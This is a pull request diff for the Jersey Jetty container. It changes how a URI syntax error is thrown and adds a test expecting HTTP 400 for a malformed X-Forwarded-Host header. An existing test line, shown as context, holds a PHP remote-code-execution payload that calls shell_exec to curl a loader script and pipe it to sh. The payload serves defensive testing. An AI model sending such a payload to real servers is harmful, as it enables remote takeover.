### PR TITLE
Exception in Jersey Jetty handler's Host header parsing bubbles up to the top

### DIFF
--- a/containers/jetty-http/src/main/java/org/glassfish/jersey/jetty/JettyHttpContainer.java
+++ b/containers/jetty-http/src/main/java/org/glassfish/jersey/jetty/JettyHttpContainer.java
@@ -238,13 +238,9 @@ public final class JettyHttpContainer extends AbstractHandler implements Contain
     }
 
 
-    private URI getBaseUri(final Request request) {
-        try {
-            return new URI(request.getScheme(), null, request.getServerName(),
-                    request.getServerPort(), getBasePath(request), null, null);
-        } catch (final URISyntaxException ex) {
-            throw new IllegalArgumentException(ex);
-        }
+    private URI getBaseUri(final Request request) throws URISyntaxException {
+        return new URI(request.getScheme(), null, request.getServerName(),
+                request.getServerPort(), getBasePath(request), null, null);
     }
 
     private String getBasePath(final Request request) {

--- a/containers/jetty-http/src/test/java/org/glassfish/jersey/jetty/ExceptionTest.java
+++ b/containers/jetty-http/src/test/java/org/glassfish/jersey/jetty/ExceptionTest.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (c) 2010, 2021 Oracle and/or its affiliates. All rights reserved.
+ * Copyright (c) 2010, 2022 Oracle and/or its affiliates. All rights reserved.
  *
  * This program and the accompanying materials are made available under the
  * terms of the Eclipse Public License v. 2.0, which is available at
@@ -58,6 +58,19 @@ public class ExceptionTest extends AbstractJettyServerTester {
                 + "&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://127.0"
                 + ".0.1/ldr.sh|sh";
         BasicHttpRequest request = new BasicHttpRequest("GET", testUri + incorrectFragment);
+        CloseableHttpClient client = HttpClientBuilder.create().build();
+
+        CloseableHttpResponse response = client.execute(new HttpHost(testUri.getHost(), testUri.getPort()), request);
+
+        assertEquals(400, response.getStatusLine().getStatusCode());
+    }
+
+    @Test
+    public void test400StatusCodeForIllegalHeaderValue() throws IOException {
+        startServer(ExceptionResource.class);
+        URI testUri = getUri().build();
+        BasicHttpRequest request = new BasicHttpRequest("GET", testUri.toString() + "/400");
+        request.addHeader("X-Forwarded-Host", "_foo.com");
         CloseableHttpClient client = HttpClientBuilder.create().build();
 
         CloseableHttpResponse response = client.execute(new HttpHost(testUri.getHost(), testUri.getPort()), request);


### PR DESCRIPTION
Fixes https://github.com/eclipse-ee4j/jersey/issues/5189